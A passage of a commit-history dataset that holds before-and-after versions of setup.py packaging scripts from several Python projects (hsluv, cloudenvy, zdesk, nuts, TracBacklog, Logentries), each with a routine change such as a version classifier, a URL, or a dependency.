"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| #! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
Add official support for Python 3.10#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
| <commit_before>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
<commit_msg>Add official support for Python 3.10<commit_after>#! /usr/bin/env python3
from setuptools import setup
from hsluv import __version__
setup(
name='hsluv',
version=__version__,
description='Human-friendly HSL',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
license="MIT",
author_email="alexei@boronine.com",
url="https://www.hsluv.org",
keywords="color hsl cie cieluv colorwheel hsluv hpluv",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
python_requires='>=3.7',
setup_requires=[
'setuptools>=38.6.0', # for long_description_content_type
],
py_modules=["hsluv"],
test_suite="tests.test_hsluv"
)
|
bfeccfd7c6d926e760f938f6073827fc0c2d3dfa | setup.py | setup.py | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| Update github link to cloudenvy org | Update github link to cloudenvy org
| Python | apache-2.0 | cloudenvy/cloudenvy | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
Update github link to cloudenvy org | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| <commit_before>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
<commit_msg>Update github link to cloudenvy org<commit_after> | try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
Update github link to cloudenvy orgtry:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
| <commit_before>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/bcwaldon/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
<commit_msg>Update github link to cloudenvy org<commit_after>try:
from setuptools import setup
except:
from distutils.core import setup
import os
def parse_requirements(requirements_filename='requirements.txt'):
requirements = []
if os.path.exists(requirements_filename):
with open(requirements_filename) as requirements_file:
for requirement in requirements_file:
requirements.append(requirement)
return requirements
config = dict(
name='cloudenvy',
version='0.1.0',
url='https://github.com/cloudenvy/cloudenvy',
description='Fast provisioning on openstack clouds.',
author='Brian Waldon',
author_email='bcwaldon@gmail.com',
install_requires=parse_requirements(),
packages=['cloudenvy', 'cloudenvy.commands'],
entry_points={
'console_scripts': [
'envy = cloudenvy.main:main',
]
},
)
setup(**config)
|
101de91508d918b90c6254dc0b1cc5e0744bbd71 | setup.py | setup.py | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| Revert "bump version for impending release" | Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.
| Python | mit | fprimex/zdesk,blade2005/zdesk,fprimex/zdgen | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec. | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| <commit_before>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
<commit_msg>Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.<commit_after> | from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
| <commit_before>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.4.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
<commit_msg>Revert "bump version for impending release"
This reverts commit c9c46f1bd4593cd1b13df404b2dba89c75c4f1ec.<commit_after>from setuptools import setup
import sys
setup(
# Basic package information.
name = 'zdesk',
author = 'Brent Woodruff',
version = '2.3.0',
author_email = 'brent@fprimex.com',
packages = ['zdesk'],
include_package_data = True,
install_requires = ['requests'],
license='LICENSE.txt',
url = 'https://github.com/fprimex/zdesk',
keywords = 'zendesk api helpdesk',
description = 'Zendesk API generated directly from developer.zendesk.com',
classifiers = [
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Internet',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
)
|
d78bcc4391f74c86eee927d9c30b58bb211d1cfe | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| Fix extras_require for test deps | Fix extras_require for test deps
| Python | mit | thusoy/nuts-auth,thusoy/nuts-auth | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
Fix extras_require for test deps | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
<commit_msg>Fix extras_require for test deps<commit_after> | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
Fix extras_require for test deps#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require={
},
packages=find_packages(),
zip_safe=False,
)
<commit_msg>Fix extras_require for test deps<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from os import path
import sys
install_requires = [
'itsdangerous',
'msgpack-python',
'pysha3',
'six',
]
extras_require = {
'test': [
'coverage',
'nose',
],
}
if sys.version_info < (3, 4, 0):
install_requires.append('enum34')
if sys.version_info < (3, 3, 0):
extras_require['test'].append('mock')
setup(
name='nuts',
version='1.0.0',
author='Tarjei Husøy',
author_email='pypi@thusoy.com',
url='https://github.com/thusoy/nuts-auth',
description='An authenticated datagram protocol. That might fly in space.',
install_requires=install_requires,
extras_require=extras_require,
packages=find_packages(),
zip_safe=False,
)
|
6459acb1b96f28e43346677b6e14173e7f30b91e | setup.py | setup.py | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
| from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| Add simplejson as a requirement for the plugin. | Add simplejson as a requirement for the plugin. | Python | bsd-3-clause | jszakmeister/trac-backlog,jszakmeister/trac-backlog | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
Add simplejson as a requirement for the plugin. | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| <commit_before>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
<commit_msg>Add simplejson as a requirement for the plugin.<commit_after> | from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
Add simplejson as a requirement for the plugin.from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
| <commit_before>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
}
)
<commit_msg>Add simplejson as a requirement for the plugin.<commit_after>from setuptools import setup
import backlog
PACKAGE = 'TracBacklog'
setup(name=PACKAGE,
version=backlog.get_version(),
packages=['backlog'],
package_data={
'backlog': [
'htdocs/css/*.css',
'htdocs/img/*.png',
'htdocs/js/*.js',
'htdocs/js/dojo/*.js',
'htdocs/js/dojo/dnd/*.js',
'htdocs/js/dojo/date/*.js',
'htdocs/js/dojo/fx/*.js',
'templates/*.html',
'scripts/*'
]},
entry_points={
'trac.plugins': ['backlog = backlog.web_ui']
},
install_requires=[
'simplejson>=2.0',
]
)
|
0dd97c8154cb73d709656fbee99b8539d73a3ea6 | setup.py | setup.py | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
| from distutils.core import setup
setup(
name='Logentries',
